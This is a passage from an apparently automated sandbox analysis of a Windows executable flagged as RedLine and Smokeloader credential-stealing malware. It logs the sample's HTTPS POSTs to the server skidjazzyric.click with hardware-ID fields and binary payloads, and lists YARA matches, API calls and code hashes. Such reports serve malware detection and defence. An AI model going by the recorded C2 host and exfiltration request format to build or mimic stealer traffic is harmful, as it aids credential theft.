2025-01-09 07:13:28 UTC	2803	OUT	Data Raw: 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2025-01-09 07:13:28 UTC	1131	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:13:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jit670vlk0v8fib7jocnoc1aad; expires=Mon, 05 May 2025 01:00:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dnLBmV4u4kw%2FOaxeIL3LLy5%2FbB7UPPXjTCS5wYvxaZIpS7qbv7gDg9dPXP2Ozn3zocfvFC%2Bnhg1lATq68vIs7rajCxIOUQGOR7WfJCoDTzlBub4sYI5qvZ1NQgnrAhqR4mGmA2g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff29ff82e8f727b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1995&rtt_var=752&sent=12&recv=23&lost=0&retrans=0&sent_bytes=3057&recv_bytes=19094&delivery_rate=2178020&cwnd=235&unsent_bytes=0&cid=181189b6b3dabfdf&ts=623&x=0"
2025-01-09 07:13:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-09 07:13:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.21.112.1	443	1068	C:\Users\user\Desktop\DPlvBkg4aj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:13:29 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YYZVB9J1Z0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8731 Host: skidjazzyric.click
2025-01-09 07:13:29 UTC	8731	OUT	Data Raw: 2d 2d 59 59 5a 56 42 39 4a 31 5a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 33 30 39 42 36 33 39 43 32 32 37 36 38 46 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 59 59 5a 56 42 39 4a 31 5a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 59 5a 56 42 39 4a 31 5a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 59 59 5a 56 42 39 4a 31 5a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --YYZVB9J1Z0Content-Disposition: form-data; name="hwid"2B309B639C22768FD0632DF0E28DC412--YYZVB9J1Z0Content-Disposition: form-data; name="pid"2--YYZVB9J1Z0Content-Disposition: form-data; name="lid"4h5VfH----YYZVB9J1Z0Content-Dispo
2025-01-09 07:13:29 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:13:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g8brl8fu32l9qgpik6rrrt4qoa; expires=Mon, 05 May 2025 01:00:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMLpXqEdB9hoHq4YUHgr1zdTjOTGyWklCfi4CluJ798eHbH3OSzHAFm3PHb6C6ppDzxHDwOGmaFJenJ53orBWvVmV5jkrR%2FQ3klvldDHH6PYH6iGCxNpGLRgJDmx15MAcRVimaE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff29fffb9ff729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1922&rtt_var=734&sent=7&recv=14&lost=0&retrans=0&sent_bytes=3058&recv_bytes=9664&delivery_rate=2216599&cwnd=170&unsent_bytes=0&cid=34e69d5aa6072c2e&ts=484&x=0"
2025-01-09 07:13:29 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-09 07:13:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	104.21.112.1	443	1068	C:\Users\user\Desktop\DPlvBkg4aj.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:13:30 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0ZBLQWT7ZO3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20390 Host: skidjazzyric.click
2025-01-09 07:13:30 UTC	15331	OUT	Data Raw: 2d 2d 30 5a 42 4c 51 57 54 37 5a 4f 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 33 30 39 42 36 33 39 43 32 32 37 36 38 46 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 30 5a 42 4c 51 57 54 37 5a 4f 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 5a 42 4c 51 57 54 37 5a 4f 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 30 5a 42 4c 51 57 54 37 5a 4f 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --0ZBLQWT7ZO3Content-Disposition: form-data; name="hwid"2B309B639C22768FD0632DF0E28DC412--0ZBLQWT7ZO3Content-Disposition: form-data; name="pid"3--0ZBLQWT7ZO3Content-Disposition: form-data; name="lid"4h5VfH----0ZBLQWT7ZO3Content-D
2025-01-09 07:13:30 UTC	5059	OUT	Data Raw: 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c Data Ascii: lrQMn 64F6(X&7~`aO@dR<
2025-01-09 07:13:31 UTC	1131	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:13:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m65ijkqer0eocf1mr84qfboh36; expires=Mon, 05 May 2025 01:00:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yV0nvS1KcokEGnKN1A1HLJtZV4wTti3n76IiFd%2FkvpMlbsiFHqpRExeHy%2BH%2Bcy2ULhDPMdPHMsmgL2btmiznRAG3YbBU1ZQuMESOm0Kz5oBjQofjHnLEILgqoY33fL4tYLqivsA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2a008ec5c43b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1552&rtt_var=597&sent=13&recv=26&lost=0&retrans=0&sent_bytes=3057&recv_bytes=21347&delivery_rate=2717121&cwnd=204&unsent_bytes=0&cid=567e970865ff440d&ts=681&x=0"
2025-01-09 07:13:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-09 07:13:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:13:21
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\DPlvBkg4aj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DPlvBkg4aj.exe"
Imagebase:	0x400000
File size:	450'048 bytes
MD5 hash:	055BF072E4FA602AFB77F598390A4DD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1934907231.00000000006C9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:13:31
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1788
Imagebase:	0x500000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	20.9%
Signature Coverage:	59.5%
Total number of Nodes:	163
Total number of Limit Nodes:	15

Executed Functions

Function 0043B870 Relevance: 37.6, APIs: 11, Strings: 10, Instructions: 880
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
VariantInit.OLEAUT32(?), ref: 0043BF3E
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C243

Strings

[&h$, xrefs: 0043BE32
96, xrefs: 0043BE52
M, xrefs: 0043BB5B
k"@ , xrefs: 0043BE3A
#~|, xrefs: 0043B89D
#~|, xrefs: 0043B8A7
:;$%, xrefs: 0043C2EC
e?^, xrefs: 0043BC4F
F*R(, xrefs: 0043BE2A
n:T8, xrefs: 0043BE4A

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
API String ID: 1810270423-2807872674
Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96

Function 00415720 Relevance: 19.3, APIs: 1, Strings: 9, Instructions: 1798COMMON

Download Yara Rule

Strings

@+p, xrefs: 00415AF1, 00415D9B, 00416862, 00416B31, 00416E4A
9?4<, xrefs: 00416345
F2}0, xrefs: 00415A76
L, xrefs: 004162B2
DASS, xrefs: 0041629C
R(RW, xrefs: 00416265
a, xrefs: 004163D3
NR@:, xrefs: 00416291
BYQZ, xrefs: 00416286

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 9?4<$@+p$BYQZ$DASS$F2}0$L$NR@:$R(RW$a
API String ID: 0-3924920542
Opcode ID: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
Opcode Fuzzy Hash: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004088A4
GetCurrentThreadId.KERNEL32 ref: 004088AE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
GetForegroundWindow.USER32 ref: 0040896A
ExitProcess.KERNEL32 ref: 00408AB7

Strings

6W01, xrefs: 004089B5

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 6W01
API String ID: 4063528623-326071965
Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

Function 0041BBA0 Relevance: 5.3, Strings: 4, Instructions: 325
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

'P0V, xrefs: 0041BD31
9HiN, xrefs: 0041BD21
WT, xrefs: 0041BD39
,D,J, xrefs: 0041BD19

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 'P0V$,D,J$9HiN$WT
API String ID: 0-3770969982
Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86

Function 00421E70 Relevance: 4.2, Strings: 3, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

au`c, xrefs: 00421FC6
(ijkdefgau`c, xrefs: 00421FBE
defgau`c, xrefs: 00421FCA

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: (ijkdefgau`c$au`c$defgau`c
API String ID: 0-3415814675
Opcode ID: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
Instruction ID: e077c08026441789f2384525beb931856e433a8fb10ce9bf48ff95afe867dbef
Opcode Fuzzy Hash: c3efea4fa2bab3c823527f8003c6373997cd92d148a9c0371e5379c7b59358e5
Instruction Fuzzy Hash: E8D10FB16083509FC714DF28C891B6BBBE1EFC5318F18892DE9858B391E7B9D805CB56

Function 006CA446 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006CA46E
Module32First.KERNEL32(00000000,00000224), ref: 006CA48E

Memory Dump Source

Source File: 00000000.00000002.1934907231.00000000006C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 006C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 9620b8b590849111a7f644b5ec7a57c879b234ed9520ec71d7241ca291bde3f5
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: AEF062311007186FD7243BF9A88DFBAB6E9EF49729F10852DE646D15C0DBB0E8454A62

Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MO, xrefs: 0040AA37
MO, xrefs: 0040A9CF

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69

Function 006C98BB Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

u, xrefs: 006C9B9D

Memory Dump Source

Source File: 00000000.00000002.1934907231.00000000006C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 006C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID: u
API String ID: 0-4067256894
Opcode ID: 1e9ab61edcd72b0306685c1da6234892a5029f71c227b88ae5e673aef252d13d
Instruction ID: 0bdd1eff77a3e9ed411da824094b077eb901d6549621cff9daba36edb4479b77
Opcode Fuzzy Hash: 1e9ab61edcd72b0306685c1da6234892a5029f71c227b88ae5e673aef252d13d
Instruction Fuzzy Hash: 0BE1DD6540E3C15FC7138B749DA9AA5BFB1AE1320070E85DFC4C4CF6A3D658A94AE363

Function 004402C0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0040CFEC Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

2B309B639C22768FD0632DF0E28DC412, xrefs: 0040D16B

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID: 2B309B639C22768FD0632DF0E28DC412
API String ID: 0-4035031634
Opcode ID: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
Instruction ID: 6f13f5d4f3e8c77ab841d9a888d2aead65439f765ee3ddc41d93c1b162d9100a
Opcode Fuzzy Hash: c0272db486a5433980f84697cda1718a3c11d4939a8aa7d752475a23ba758509
Instruction Fuzzy Hash: 5B516A726057008FD329CF38CC92B577BA3AFD6314B1D866DC4964B796EB39A406C744

Function 0040CA62 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb278277fedf1e8d52e66d84e555e82bab7541452ed5cead15742adef644b5f
Instruction ID: 618579726118e679aa1534d0b4440190eb114bb965ab7fb83873a39d39203c85
Opcode Fuzzy Hash: 7eb278277fedf1e8d52e66d84e555e82bab7541452ed5cead15742adef644b5f
Instruction Fuzzy Hash: 3E5136766083118BC718DF64D89266BB7E2FFD4304F18DA2EE4C69B390DB749801C786

Function 0066003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0066024D

Strings

cess, xrefs: 0066018D
kernel32.dll, xrefs: 0066008F, 00660095

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 8728a758dab89e9ea64e30a78b4b1ed508de18543e59f78f2a777fecd39c5750
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 91526874A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E94DAB351DB30AE85DF14

Function 0040E3D3 Relevance: 3.1, APIs: 2, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
Instruction ID: b2aa6f84acc7d50c337c606844e5536a7248dcea6e3e3aabb346ed1b6ad7aec1
Opcode Fuzzy Hash: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
Instruction Fuzzy Hash: CC41FAB4C10B40AFD370EF3D9A0B7167EB4AB05214F404B2DF9E6966D4E230A4198BD7

Function 00660E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00660223,?,?), ref: 00660E19
SetErrorMode.KERNELBASE(00000000,?,?,00660223,?,?), ref: 00660E1E

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
